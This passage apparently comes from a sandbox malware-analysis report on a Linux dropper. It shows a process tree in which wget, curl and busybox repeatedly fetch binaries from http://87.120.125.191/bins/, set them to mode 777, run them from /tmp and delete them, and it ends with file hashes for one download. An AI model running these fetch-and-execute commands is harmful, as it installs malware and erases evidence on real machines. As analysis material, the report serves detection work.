                                                                                                                                                • /tmp/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                                                                                                                  ./cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:923
                                                                                                                                                • /bin/rm
                                                                                                                                                  rm cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                                                                                                                  2⤵
                                                                                                                                                    PID:925
                                                                                                                                                  • /usr/bin/wget
                                                                                                                                                    wget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                                                                                                    2⤵
                                                                                                                                                      PID:926
                                                                                                                                                    • /usr/bin/curl
                                                                                                                                                      curl -O http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                                                                                                      2⤵
                                                                                                                                                      • Checks CPU configuration
                                                                                                                                                      • Reads runtime system information
                                                                                                                                                      • Writes file to tmp directory
                                                                                                                                                      PID:927
                                                                                                                                                    • /bin/busybox
                                                                                                                                                      /bin/busybox wget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                                                                                                      2⤵
                                                                                                                                                        PID:928
                                                                                                                                                      • /bin/chmod
                                                                                                                                                        chmod 777 nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                                                                                                        2⤵
                                                                                                                                                        • File and Directory Permissions Modification
                                                                                                                                                        PID:929
                                                                                                                                                      • /tmp/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                                                                                                        ./nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                                                                                                        2⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:930
                                                                                                                                                      • /bin/rm
                                                                                                                                                        rm nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                                                                                                        2⤵
                                                                                                                                                          PID:932
                                                                                                                                                        • /usr/bin/wget
                                                                                                                                                          wget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                                                                                                          2⤵
                                                                                                                                                            PID:933
                                                                                                                                                          • /usr/bin/curl
                                                                                                                                                            curl -O http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                                                                                                            2⤵
                                                                                                                                                            • Checks CPU configuration
                                                                                                                                                            • Reads runtime system information
                                                                                                                                                            • Writes file to tmp directory
                                                                                                                                                            PID:934
                                                                                                                                                          • /bin/busybox
                                                                                                                                                            /bin/busybox wget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                                                                                                            2⤵
                                                                                                                                                              PID:935
                                                                                                                                                            • /bin/chmod
                                                                                                                                                              chmod 777 J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                                                                                                              2⤵
                                                                                                                                                              • File and Directory Permissions Modification
                                                                                                                                                              PID:936
                                                                                                                                                            • /tmp/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                                                                                                              ./J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                                                                                                              2⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:937
                                                                                                                                                            • /bin/rm
                                                                                                                                                              rm J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                                                                                                              2⤵
                                                                                                                                                                PID:939
                                                                                                                                                              • /usr/bin/wget
                                                                                                                                                                wget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:940

                                                                                                                                                              Network

                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                              Replay Monitor

                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                              Downloads

                                                                                                                                                              • /tmp/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND

                                                                                                                                                                Filesize

                                                                                                                                                                114B

                                                                                                                                                                MD5

                                                                                                                                                                546071c6a6aeff34580b4d1a9b35a7c3

                                                                                                                                                                SHA1

                                                                                                                                                                dc2de298837a86d3bc86e8a328411229d9eccdb6

                                                                                                                                                                SHA256

                                                                                                                                                                2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12

                                                                                                                                                                SHA512

                                                                                                                                                                207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7